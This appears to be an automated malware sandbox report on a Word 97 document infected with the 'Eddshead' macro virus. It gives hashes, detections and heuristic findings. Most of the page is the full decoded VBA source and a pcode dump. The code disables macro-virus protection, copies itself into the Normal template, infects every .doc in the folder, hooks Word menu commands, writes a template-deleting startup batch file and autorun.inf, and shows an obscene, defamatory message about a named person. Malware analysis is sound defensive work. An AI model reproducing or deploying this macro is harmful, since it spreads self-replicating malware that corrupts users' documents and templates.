Office (OLE) malware analysis — malicious · 7a046b89ca7cf144

MALICIOUS

Office (OLE)

39.5 KB Created: 2000-04-20 19:58:00 Authoring application: Microsoft Word 8.0 First seen: 2014-03-02

MD5: 0b9a23d80aba925412ee32f0741e2fc5 SHA-1: 680542652dffc2284969b0b610aadd2966d3334d SHA-256: 7a046b89ca7cf1445b0a801e5ea2ba95f5c380ad47abfa16596825561ddd89e8

256 Risk Score

Heuristics 6

ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Trojan.Pivis-2
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
    .VirusProtection = False
```
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Auto_Close macro low OLE_VBA_AUTOCLOSE

Auto_Close macro
Matched line in script
```
Sub AutoClose()
```
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	28108 bytes
SHA-256: `c1a79d34fdf061bcc5b7933cbbe56d2c36c5a96c799b433212206df87650a4a2`
Detection ClamAV: Doc.Trojan.Edds-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Eddshead" Public Skip As Integer Sub Eddshead() ' This is the first release of the eddshead MARCO virii ' Greetings go out to, Mr. Pink, Mr. blonde, Mr. Brown ' Mr. Blue and need we forget Mr. Orange (you still own me £10) On Error Resume Next Randomize sv = Int(Rnd * 3) + 1 If sv = 1 Then svt$ = "eddie.doc" If sv = 3 Then svt$ = "orange.doc" If sv = 2 Then svt$ = "pink.doc" With Options .ConfirmConversions = False .VirusProtection = False .SaveNormalPrompt = False End With ActiveDocument.ReadOnlyRecommended = False rm = Int(Rnd * 100) If rm = 99 Then MsgBox "Your Computer Has The EddsHead Marco Virii", vbSystemModal If rm = 10 Then MsgBox "Mr. Goodall is a cunt, watch your children!", vbSystemModal If Month(Now()) = 11 And Day(Now()) = 4 Then MsgBox "Happy Birthday Edd", vbInformation, "Birthday Greeting!!!" If Month(Now()) = 2 And Day(Now()) = 2 Then MsgBox "Your hard drive is being formated", vbInformation, "System notice" With Dialogs(wdDialogFileSummaryInfo) .Author = "Nice Guy Eddie" .Subject = "Eddshead Marco Virii" .Comments = "Who did you get this document from ??" .Execute End With x81333293 = 0 Set cy329813311 = MacroContainer f1516$ = "c:\windows\startm~1\programs\startup\msfile.bat" j3283329 = GetAttr(NormalTemplate.FullName) If j3283329 = vbReadOnly And System.OperatingSystem = "Windows" And System.LanguageDesignation = "English(United States)" Then Call vBitchES(f1516$) If j3283329 = vbReadOnly + vbArchive And System.OperatingSystem = "Windows" And System.LanguageDesignation = "English(United States)" Then Call vBitchES(f1516$) If j3283329 = vbReadOnly Then GoTo orange If j3283329 = vbReadOnly + vbArchive Then GoTo orange If cy329813311 = NormalTemplate Then x81333293 = 1 If x81333293 = 1 Then r486813310 = NormalTemplate.FullName Else r486813310 = ActiveDocument.FullName If x81333293 = 1 Then domeharderbaby32910 = ActiveDocument.FullName Else domeharderbaby32910 = NormalTemplate.FullName Application.OrganizerCopy Source:=r486813310, Destination:=domeharderbaby32910, Name:="Eddshead", Object:=wdOrganizerObjectProjectItems If x81333293 = 1 And Skip <> 1 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument If x81333293 = 0 Then If NormalTemplate.Saved = False Then NormalTemplate.Save End If Call dhIconDisco("C:\autorun.inf") orange: End Sub Sub HelpAbout() On Error Resume Next MsgBox "Eddshead", vbInformation End Sub Sub FileNew() On Error Resume Next Call Eddshead Dialogs(wdDialogFileNew).Show Skip = 1 Call Eddshead End Sub Sub FileSave() On Error Resume Next Call Eddshead ActiveDocument.Save End Sub Sub FileClose() On Error Resume Next Call Eddshead If ActiveDocument.Saved = False Then ActiveDocument.Save ActiveDocument.Close End Sub Sub ToolsOptions() On Error Resume Next Dialogs(wdDialogToolsOptions).Show Call Eddshead End Sub Sub EditFind() On Error Resume Next Dialogs(wdDialogEditFind).Show Call Eddshead End Sub Sub FileSaveAs() On Error Resume Next Dialogs(wdDialogFileSaveAs).Show Call Eddshead End Sub Sub FilePrint() On Error Resume Next Dialogs(wdDialogFilePrint).Show Call Eddshead End Sub Sub FileExit() On Error Resume Next Call Eddshead If ActiveDocument.Saved = False Then ActiveDocument.Save Application.WindowState = wdWindowStateMinimize pName = CurDir & "\" fName = Dir(pName & ".doc", sAttr) If (fName <> "") And ((fName <> ".") And (fName <> "..")) Then InfectDoc = pName & fName Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _ False, AddToRecentFiles:=False, PasswordDocument:="" Call Eddshead Do While (fName <> "") fName = Dir() If (fName <> "") And _ ((fName <> ".") And (fName <> "..")) Then InfectDoc = pName & fName Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _ False, AddToRecentFiles:=False, PasswordDocument:="" Call Eddshead End If Loop ChangeFileOpenDirectory "p:" ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False ChangeFileOpenDirectory "h:" ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False ChangeFileOpenDirectory "f:" ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False Application.Quit End Sub Sub AutoOpen() On Error Resume Next Call Eddshead End Sub Sub AutoExit() On Error Resume Next Call Eddshead Application.WindowState = wdWindowStateMinimize pName = CurDir & "\" fName = Dir(pName & ".doc", sAttr) If (fName <> "") And ((fName <> ".") And (fName <> "..")) Then InfectDoc = pName & fName Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _ False, AddToRecentFiles:=False, PasswordDocument:="" Call Eddshead Do While (fName <> "") fName = Dir() If (fName <> "") And _ ((fName <> ".") And (fName <> "..")) Then InfectDoc = pName & fName Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _ False, AddToRecentFiles:=False, PasswordDocument:="" Call Eddshead End If Loop If ActiveDocument.Saved = False Then ActiveDocument.Save ChangeFileOpenDirectory "p:" ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False ChangeFileOpenDirectory "r:" ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False ChangeFileOpenDirectory "s:" ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False End Sub Sub AutoExec() On Error Resume Next Call Eddshead End Sub Sub AutoClose() On Error Resume Next Call Eddshead End Sub Sub ToolsMacro() On Error Resume Next Call Eddshead Call p3283 End Sub Sub FileTemplates() On Error Resume Next Call Eddshead Call p3283 End Sub Sub ViewVBCode() On Error Resume Next Call Eddshead Call p3283 End Sub Sub p3283() On Error Resume Next Selection.HomeKey Unit:=wdStory Selection.Find.ClearFormatting Selection.Find.Replacement.ClearFormatting With Selection.Find .Text = "." .Replacement.Text = "Eddshead" .Forward = True .Wrap = wdFindContinue .Format = False .MatchCase = False .MatchWholeWord = True .MatchAllWordForms = False End With Selection.Find.Execute Replace:=wdReplaceAll End Sub Sub vBitchES(strFile As String) Dim hFile As Long On Error Resume Next n$ = NormalTemplate Part11$ = "attrib -h -r " snag$ = "c:\progra~1\micros~1\templa~1\" snag1$ = "c:\progra~1\micros~2\templa~1\" Part2$ = "del " hFile = FreeFile Open strFile For Output Access Write As hFile Print #hFile, "@echo off" Print #hFile, Part11$ + snag$ + n$ Print #hFile, Part11$ + snag1$ + n$ Print #hFile, Part2$ + snag$ + n$ Print #hFile, Part2$ + snag1$ + n$ Print #hFile, "cls" Print #hFile, Part2$ + "c:\windows\startm~1\programs\startup\msfile.bat" Close hFile End Sub Sub dhIconDisco(strFile As String) Dim hFile As Long On Error Resume Next Randomize Choice = Int(Rnd * 2) rnn$ = Int(Rnd * 66) + 2 rn$ = Int(Rnd * 27) + 1 Part1$ = "[autorun]" Part2$ = "icon = c:\windows\system\pifmgr.dll," Part22$ = "icon = c:\windows\SYSTEM\shell32.dll," Part3$ = Part2$ + rn$ Part33$ = Part22$ + rnn$ hFile = FreeFile Open strFile For Output Access Write As hFile Print #hFile, Part1$ If Choice = 0 Then Print #hFile, Part3$ Else Print #hFile, Part33$ End If Close hFile End Sub ' Processing file: /tmp/qstore_780j9mv3 ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 903 bytes ' Macros/VBA/Eddshead - 13060 bytes ' Line #0: ' Line #1: ' Dim (Public) ' VarDefn Skip (As Integer) ' Line #2: ' Line #3: ' Line #4: ' FuncDefn (Sub Eddshead()) ' Line #5: ' Line #6: ' QuoteRem 0x0004 0x0036 " This is the first release of the eddshead MARCO virii" ' Line #7: ' QuoteRem 0x0004 0x0035 " Greetings go out to, Mr. Pink, Mr. blonde, Mr. Brown" ' Line #8: ' QuoteRem 0x0004 0x003E " Mr. Blue and need we forget Mr. Orange (you still own me £10)" ' Line #9: ' Line #10: ' Line #11: ' OnError (Resume Next) ' Line #12: ' ArgsCall Read 0x0000 ' Line #13: ' Ld Rnd ' LitDI2 0x0003 ' Mul ' FnInt ' LitDI2 0x0001 ' Add ' St sv ' Line #14: ' Ld sv ' LitDI2 0x0001 ' Eq ' If ' BoSImplicit ' LitStr 0x0009 "eddie.doc" ' St svt$ ' EndIf ' Line #15: ' Ld sv ' LitDI2 0x0003 ' Eq ' If ' BoSImplicit ' LitStr 0x000A "orange.doc" ' St svt$ ' EndIf ' Line #16: ' Ld sv ' LitDI2 0x0002 ' Eq ' If ' BoSImplicit ' LitStr 0x0008 "pink.doc" ' St svt$ ' EndIf ' Line #17: ' StartWithExpr ' Ld Options ' With ' Line #18: ' LitVarSpecial (False) ' MemStWith ConfirmConversions ' Line #19: ' LitVarSpecial (False) ' MemStWith VirusProtection ' Line #20: ' LitVarSpecial (False) ' MemStWith SaveNormalPrompt ' Line #21: ' EndWith ' Line #22: ' LitVarSpecial (False) ' Ld ActiveDocument ' MemSt ReadOnlyRecommended ' Line #23: ' Ld Rnd ' LitDI2 0x0064 ' Mul ' FnInt ' St rm ' Line #24: ' Ld rm ' LitDI2 0x0063 ' Eq ' If ' BoSImplicit ' LitStr 0x002A "Your Computer Has The EddsHead Marco Virii" ' Ld vbSystemModal ' ArgsCall MsgBox 0x0002 ' EndIf ' Line #25: ' Ld rm ' LitDI2 0x000A ' Eq ' If ' BoSImplicit ' LitStr 0x002B "Mr. Goodall is a cunt, watch your children!" ' Ld vbSystemModal ' ArgsCall MsgBox 0x0002 ' EndIf ' Line #26: ' ArgsLd Now 0x0000 ' ArgsLd Month 0x0001 ' LitDI2 0x000B ' Eq ' ArgsLd Now 0x0000 ' ArgsLd Day 0x0001 ' LitDI2 0x0004 ' Eq ' And ' If ' BoSImplicit ' LitStr 0x0012 "Happy Birthday Edd" ' Ld vbInformation ' LitStr 0x0014 "Birthday Greeting!!!" ' ArgsCall MsgBox 0x0003 ' EndIf ' Line #27: ' ArgsLd Now 0x0000 ' ArgsLd Month 0x0001 ' LitDI2 0x0002 ' Eq ' ArgsLd Now 0x0000 ' ArgsLd Day 0x0001 ' LitDI2 0x0002 ' Eq ' And ' If ' BoSImplicit ' LitStr 0x0021 "Your hard drive is being formated" ' Ld vbInformation ' LitStr 0x000D "System notice" ' ArgsCall MsgBox 0x0003 ' EndIf ' Line #28: ' Line #29: ' StartWithExpr ' Ld wdDialogFileSummaryInfo ' ArgsLd Dialogs 0x0001 ' With ' Line #30: ' LitStr 0x000E "Nice Guy Eddie" ' MemStWith Author ' Line #31: ' LitStr 0x0014 "Eddshead Marco Virii" ' MemStWith Subject ' Line #32: ' LitStr 0x0025 "Who did you get this document from ??" ' MemStWith Comments ' Line #33: ' ArgsMemCallWith Execute 0x0000 ' Line #34: ' EndWith ' Line #35: ' LitDI2 0x0000 ' St x81333293 ' Line #36: ' SetStmt ' Ld MacroContainer ' Set cy329813311 ' Line #37: ' LitStr 0x002F "c:\windows\startm~1\programs\startup\msfile.bat" ' St f1516$ ' Line #38: ' Ld NormalTemplate ' MemLd FullName ' ArgsLd GetAttr 0x0001 ' St j3283329 ' Line #39: ' Ld j3283329 ' Ld vbReadOnly ' Eq ' Ld System ' MemLd OperatingSystem ' LitStr 0x0007 "Windows" ' Eq ' And ' Ld System ' MemLd LanguageDesignation ' LitStr 0x0016 "English(United States)" ' Eq ' And ' If ' BoSImplicit ' Ld f1516$ ' ArgsCall (Call) vBitchES 0x0001 ' EndIf ' Line #40: ' Ld j3283329 ' Ld vbReadOnly ' Ld vbArchive ' Add ' Eq ' Ld System ' MemLd OperatingSystem ' LitStr 0x0007 "Windows" ' Eq ' And ' Ld System ' MemLd LanguageDesignation ' LitStr 0x0016 "English(United States)" ' Eq ' And ' If ' BoSImplicit ' Ld f1516$ ' ArgsCall (Call) vBitchES 0x0001 ' EndIf ' Line #41: ' Ld j3283329 ' Ld vbReadOnly ' Eq ' If ' BoSImplicit ' GoTo orange ' EndIf ' Line #42: ' Ld j3283329 ' Ld vbReadOnly ' Ld vbArchive ' Add ' Eq ' If ' BoSImplicit ' GoTo orange ' EndIf ' Line #43: ' Ld cy329813311 ' Ld NormalTemplate ' Eq ' If ' BoSImplicit ' LitDI2 0x0001 ' St x81333293 ' EndIf ' Line #44: ' Ld x81333293 ' LitDI2 0x0001 ' Eq ' If ' BoSImplicit ' Ld NormalTemplate ' MemLd FullName ' St r486813310 ' Else ' BoSImplicit ' Ld ActiveDocument ' MemLd FullName ' St r486813310 ' EndIf ' Line #45: ' Ld x81333293 ' LitDI2 0x0001 ' Eq ' If ' BoSImplicit ' Ld ActiveDocument ' MemLd FullName ' St domeharderbaby32910 ' Else ' BoSImplicit ' Ld NormalTemplate ' MemLd FullName ' St domeharderbaby32910 ' EndIf ' Line #46: ' Ld r486813310 ' ParamNamed Source ' Ld domeharderbaby32910 ' ParamNamed Destination ' LitStr 0x0008 "Eddshead" ' ParamNamed New ' Ld wdOrganizerObjectProjectItems ' ParamNamed On ' Ld Application ' ArgsMemCall OrganizerCopy 0x0004 ' Line #47: ' Ld x81333293 ' LitDI2 0x0001 ' Eq ' Ld Skip ' LitDI2 0x0001 ' Ne ' And ' If ' BoSImplicit ' Ld ActiveDocument ' MemLd FullName ' ParamNamed FileName ' Ld wdFormatDocument ' ParamNamed FileFormat ' Ld ActiveDocument ' ArgsMemCall SaveAs 0x0002 ' EndIf ' Line #48: ' Ld x81333293 ' LitDI2 0x0000 ' Eq ' IfBlock ' Line #49: ' Ld NormalTemplate ' MemLd Saved ' LitVarSpecial (False) ' Eq ' If ' BoSImplicit ' Ld NormalTemplate ' ArgsMemCall Save 0x0000 ' EndIf ' Line #50: ' EndIfBlock ' Line #51: ' LitStr 0x000E "C:\autorun.inf" ' ArgsCall (Call) dhIconDisco 0x0001 ' Line #52: ' Label orange ' Line #53: ' EndSub ' Line #54: ' FuncDefn (Sub HelpAbout()) ' Line #55: ' OnError (Resume Next) ' Line #56: ' LitStr 0x0008 "Eddshead" ' Ld vbInformation ' ArgsCall MsgBox 0x0002 ' Line #57: ' EndSub ' Line #58: ' FuncDefn (Sub FileNew()) ' Line #59: ' OnError (Resume Next) ' Line #60: ' ArgsCall (Call) Eddshead 0x0000 ' Line #61: ' Ld wdDialogFileNew ' ArgsLd Dialogs 0x0001 ' ArgsMemCall Show 0x0000 ' Line #62: ' LitDI2 0x0001 ' St Skip ' Line #63: ' ArgsCall (Call) Eddshead 0x0000 ' Line #64: ' EndSub ' Line #65: ' FuncDefn (Sub FileSave()) ' Line #66: ' OnError (Resume Next) ' Line #67: ' ArgsCall (Call) Eddshead 0x0000 ' Line #68: ' Ld ActiveDocument ' ArgsMemCall Save 0x0000 ' Line #69: ' EndSub ' Line #70: ' FuncDefn (Sub FileClose()) ' Line #71: ' OnError (Resume Next) ' Line #72: ' ArgsCall (Call) Eddshead 0x0000 ' Line #73: ' Ld ActiveDocument ' MemLd Saved ' LitVarSpecial (False) ' Eq ' If ' BoSImplicit ' Ld ActiveDocument ' ArgsMemCall Save 0x0000 ' EndIf ' Line #74: ' Ld ActiveDocument ' ArgsMemCall Close 0x0000 ' Line #75: ' EndSub ' Line #76: ' FuncDefn (Sub ToolsOptions()) ' Line #77: ' OnError (Resume Next) ' Line #78: ' Ld wdDialogToolsOptions ' ArgsLd Dialogs 0x0001 ' ArgsMemCall Show 0x0000 ' Line #79: ' ArgsCall (Call) Eddshead 0x0000 ' Line #80: ' EndSub ' Line #81: ' FuncDefn (Sub EditFind()) ' Line #82: ' OnError (Resume Next) ' Line #83: ' Ld wdDialogEditFind ' ArgsLd Dialogs 0x0001 ' ArgsMemCall Show 0x0000 ' Line #84: ' ArgsCall (Call) Eddshead 0x0000 ' Line #85: ' EndSub ' Line #86: ' FuncDefn (Sub FileSaveAs()) ' Line #87: ' OnError (Resume Next) ' Line #88: ' Ld wdDialogFileSaveAs ' ArgsLd Dialogs 0x0001 ' ArgsMemCall Show 0x0000 ' Line #89: ' ArgsCall (Call) Eddshead 0x0000 ' Line #90: ' EndSub ' Line #91: ' FuncDefn (Sub FilePrint()) ' Line #92: ' OnError (Resume Next) ' Line #93: ' Ld wdDialogFilePrint ' ArgsLd Dialogs 0x0001 ' ArgsMemCall Show 0x0000 ' Line #94: ' ArgsCall (Call) Eddshead 0x0000 ' Line #95: ' EndSub ' Line #96: ' FuncDefn (Sub FileExit()) ' Line #97: ' OnError (Resume Next) ' Line #98: ' ArgsCall (Call) Eddshead 0x0000 ' Line #99: ' Ld ActiveDocument ' MemLd Saved ' LitVarSpecial (False) ' Eq ' If ' BoSImplicit ' Ld ActiveDocument ' ArgsMemCall Save 0x0000 ' EndIf ' Line #100: ' Ld wdWindowStateMinimize ' Ld Application ' MemSt WindowState ' Line #101: ' Ld CurDir ' LitStr 0x0001 "\" ' Concat ' St pName ' Line #102: ' Ld pName ' LitStr 0x0005 ".doc" ' Concat ' Ld sAttr ' ArgsLd Dir 0x0002 ' St fName ' Line #103: ' Ld fName ' LitStr 0x0000 "" ' Ne ' Paren ' Ld fName ' LitStr 0x0001 "." ' Ne ' Paren ' Ld fName ' LitStr 0x0002 ".." ' Ne ' Paren ' And ' Paren ' And ' If ' BoSImplicit ' Ld pName ' Ld fName ' Concat ' St InfectDoc ' EndIf ' Line #104: ' LineCont 0x0004 0D 00 00 00 ' Ld InfectDoc ' ParamNamed FileName ' LitVarSpecial (False) ' ParamNamed ConfirmConversions ' LitVarSpecial (False) ' ParamNamed ReadOnly ' LitVarSpecial (False) ' ParamNamed AddToRecentFiles ' LitStr 0x0000 "" ' ParamNamed PasswordDocument ' Ld Documents ' ArgsMemCall Option 0x0005 ' Line #105: ' ArgsCall (Call) Eddshead 0x0000 ' Line #106: ' Ld fName ' LitStr 0x0000 "" ' Ne ' Paren ' DoWhile ' Line #107: ' ArgsLd Dir 0x0000 ' St fName ' Line #108: ' LineCont 0x0004 07 00 00 00 ' Ld fName ' LitStr 0x0000 "" ' Ne ' Paren ' Ld fName ' LitStr 0x0001 "." ' Ne ' Paren ' Ld fName ' LitStr 0x0002 ".." ' Ne ' Paren ' And ' Paren ' And ' IfBlock ' Line #109: ' Ld pName ' Ld fName ' Concat ' St InfectDoc ' Line #110: ' LineCont 0x0004 0D 00 00 00 ' Ld InfectDoc ' ParamNamed FileName ' LitVarSpecial (False) ' ParamNamed ConfirmConversions ' LitVarSpecial (False) ' ParamNamed ReadOnly ' LitVarSpecial (False) ' ParamNamed AddToRecentFiles ' LitStr 0x0000 "" ' ParamNamed PasswordDocument ' Ld Documents ' ArgsMemCall Option 0x0005 ' Line #111: ' ArgsCall (Call) Eddshead 0x0000 ' Line #112: ' EndIfBlock ' Line #113: ' Loop ' Line #114: ' LitStr 0x0002 "p:" ' ArgsCall ChangeFileOpenDirectory 0x0001 ' Line #115: ' Ld svt$ ' ParamNamed FileName ' LitVarSpecial (False) ' ParamNamed LockComments ' LitStr 0x002A ", AddToRecentFiles:=False, WritePassword:=" ' ParamNamed Password ' LitVarSpecial (False) ' ParamNamed ReadOnlyRecommended ' Ld ActiveDocument ' ArgsMemCall SaveAs 0x0004 ' Line #116: ' LitStr 0x0002 "h:" ' ArgsCall ChangeFileOpenDirectory 0x0001 ' Line #117: ' Ld svt$ ' ParamNamed FileName ' LitVarSpecial (False) ' ParamNamed LockComments ' LitStr 0x002A ", AddToRecentFiles:=False, WritePassword:=" ' ParamNamed Password ' LitVarSpecial (False) ' ParamNamed ReadOnlyRecommended ' Ld ActiveDocument ' ArgsMemCall SaveAs 0x0004 ' Line #118: ' LitStr 0x0002 "f:" ' ArgsCall ChangeFileOpenDirectory 0x0001 ' Line #119: ' Ld svt$ ' ParamNamed FileName ' LitVarSpecial (False) ' ParamNamed LockComments ' LitStr 0x002A ", AddToRecentFiles:=False, WritePassword:=" ' ParamNamed Password ' LitVarSpecial (False) ' ParamNamed ReadOnlyRecommended ' Ld ActiveDocument ' ArgsMemCall SaveAs 0x0004 ' Line #120: ' Ld Application ' ArgsMemCall Quit 0x0000 ' Line #121: ' EndSub ' Line #122: ' FuncDefn (Sub AutoOpen()) ' Line #123: ' OnError (Resume Next) ' Line #124: ' ArgsCall (Call) Eddshead 0x0000 ' Line #125: ' EndSub ' Line #126: ' FuncDefn (Sub AutoExit()) ' Line #127: ' OnError (Resume Next) ' Line #128: ' ArgsCall (Call) Eddshead 0x0000 ' Line #129: ' Ld wdWindowStateMinimize ' Ld Application ' MemSt WindowState ' Line #130: ' Ld CurDir ' LitStr 0x0001 "\" ' Concat ' St pName ' Line #131: ' Ld pName ' LitStr 0x0005 ".doc" ' Concat ' Ld sAttr ' ArgsLd Dir 0x0002 ' St fName ' Line #132: ' Ld fName ' LitStr 0x0000 "" ' Ne ' Paren ' Ld fName ' LitStr 0x0001 "." ' Ne ' Paren ' Ld fName ' LitStr 0x0002 ".." ' Ne ' Paren ' And ' Paren ' And ' If ' BoSImplicit ' Ld pName ' Ld fName ' Concat ' St InfectDoc ' EndIf ' Line #133: ' LineCont 0x0004 0D 00 00 00 ' Ld InfectDoc ' ParamNamed FileName ' LitVarSpecial (False) ' ParamNamed ConfirmConversions ' LitVarSpecial (False) ' ParamNamed ReadOnly ' LitVarSpecial (False) ' ParamNamed AddToRecentFiles ' LitStr 0x0000 "" ' ParamNamed PasswordDocument ' Ld Documents ' ArgsMemCall Option 0x0005 ' Line #134: ' ArgsCall (Call) Eddshead 0x0000 ' Line #135: ' Ld fName ' LitStr 0x0000 "" ' Ne ' Paren ' DoWhile ' Line #136: ' ArgsLd Dir 0x0000 ' St fName ' Line #137: ' LineCont 0x0004 07 00 00 00 ' Ld fName ' LitStr 0x0000 "" ' Ne ' Paren ' Ld fName ' LitStr 0x0001 "." ' Ne ' Paren ' Ld fName ' LitStr 0x0002 ".." ' Ne ' Paren ' And ' Paren ' And ' IfBlock ' Line #138: ' Ld pName ' Ld fName ' Concat ' St InfectDoc ' Line #139: ' LineCont 0x0004 0D 00 00 00 ' Ld InfectDoc ' ParamNamed FileName ' LitVarSpecial (False) ' ParamNamed ConfirmConversions ' LitVarSpecial (False) ' ParamNamed ReadOnly ' LitVarSpecial (False) ' ParamNamed AddToRecentFiles ' LitStr 0x0000 "" ' ParamNamed PasswordDocument ' Ld Documents ' ArgsMemCall Option 0x0005 ' Line #140: ' ArgsCall (Call) Eddshead 0x0000 ' Line #141: ' EndIfBlock ' Line #142: ' Loop ' Line #143: ' Ld ActiveDocument ' MemLd Saved ' LitVarSpecial (False) ' Eq ' If ' BoSImplicit ' Ld ActiveDocument ' ArgsMemCall Save 0x0000 ' EndIf ' Line #144: ' LitStr 0x0002 "p:" ' ArgsCall ChangeFileOpenDirectory 0x0001 ' Line #145: ' Ld svt$ ' ParamNamed FileName ' LitVarSpecial (False) ' ParamNamed LockComments ' LitStr 0x002A ", AddToRecentFiles:=False, WritePassword:=" ' ParamNamed Password ' LitVarSpecial (False) ' ParamNamed ReadOnlyRecommended ' Ld ActiveDocument ' ArgsMemCall SaveAs 0x0004 ' Line #146: ' LitStr 0x0002 "r:" ' ArgsCall ChangeFileOpenDirectory 0x0001 ' Line #147: …

Open this report in the interactive analyzer, or submit your own file for analysis.